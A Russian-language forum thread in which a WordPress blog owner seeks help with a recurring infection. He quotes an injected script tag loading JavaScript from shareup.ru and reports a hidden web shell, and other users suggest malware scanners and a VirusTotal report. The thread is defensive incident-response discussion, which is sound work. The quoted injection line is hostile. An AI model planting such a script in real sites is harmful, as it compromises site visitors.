Прошу помощи в поиске уязвимости WP

  • Автор темы Автор темы Bahus
  • Дата начала Дата начала

Bahus

Новый пользователь
Сообщения
7
Реакции
0
Доброго времени суток. Не так давно нашел в коде статей на блоге (cms wordpress) dendrblog.ru такую муть
Код:
<script src="//shareup.ru/social.js" type="text/javascript"></script>
Так же хостер обматерил меня за вирус на сайте. После проверки был найден PHP.BlacoleRef. Все вылечили. Левый скрипт вычищен из статей.
Прошла неделя. Вирусов больше не найдено, а скрипт снова во всех статьях. Откуда эта гнида лезет не пойму. Так же не понятно, что первично вирус, загружающий скрипт или скрипт, загружающий вирус?
 
Откуда эта гнида лезет не пойму. Так же не понятно, что первично вирус, загружающий скрипт или скрипт, загружающий вирус?
Bahus, первично - уязвимости в CMS WordPress, через которую всё это позволяется, см. вот эту статью.
 
У меня нет WP-Super-Cache
Bahus, это просто реклама была, разумеется та статься к вашему взлому никакого отношения не имеет, кроме того что там тоже про wordpress. Думаю движок у вас обновлён до последней версии?
По вопросу, скрипт внутри тела страниц вторичен и является следствием заражения.
 
Все постоянно обновляется до последних версий сразу же после выхода.
 
После проверки был найден PHP.BlacoleRef. Все вылечили. Левый скрипт вычищен из статей.
А чем проверяли? Вычистили только этот скрипт (может там ещё зараза осталась, которую не вычистили)? Возможно глупый вопрос, но Айболитом или Manul-ом проверяли?
+ у вас на сайте есть такие ссылки
Код:
http://goo.gl/6UnImm
http://goo.gl/Sqz26j
они вам знакомы?
 
httр://gоо.gl/ - я ,кстати, слышал, что это боевой вирус (по новостям говорили)
 
Последнее редактирование:
Bahus, у Яндекса в этом году появился Манул, мы его тут представляли летом.
Если Ваш хостер и Вирусдай позволяют, то воспользуйтесь. Как пользоваться, там указано.
Указанный вами скрипт атакует сайты на основе ВордПресса уже примерно полгода. Сведения из новостей здесь не помогут. Инъекция непростая.
 
Последнее редактирование:
httр://gоо.gl/ - я ,кстати, слышал, что это боевой вирус (по новостям говорили)
Это просто сервис сокращения ссылок. Для чего используют и где это уже другой вопрос.
К примеру
Код:
http://goo.gl/swAkXv
- это ссылка на эту страницу.
 
Появился левый файл с шелом. Хотелось бы его раскодировать, чтобы понять, звенья одной цепи или два независимых взлома.
Код тут
 
Последнее редактирование:
Хотелось бы его раскодировать
без знания, что передают в $_POST['g__g_'] или тут $_COOKIE['g__g_'] скорее всего расшифровать не получиться.
И добавлю отчёт о проверке на вирустотал Antivirus scan for 20f76ada1721b61963fa595e3a2006c96225351362b79d5d719197c190cd4239 at 2015-11-19 06:23:34 UTC - VirusTotal
 
Назад
Сверху Снизу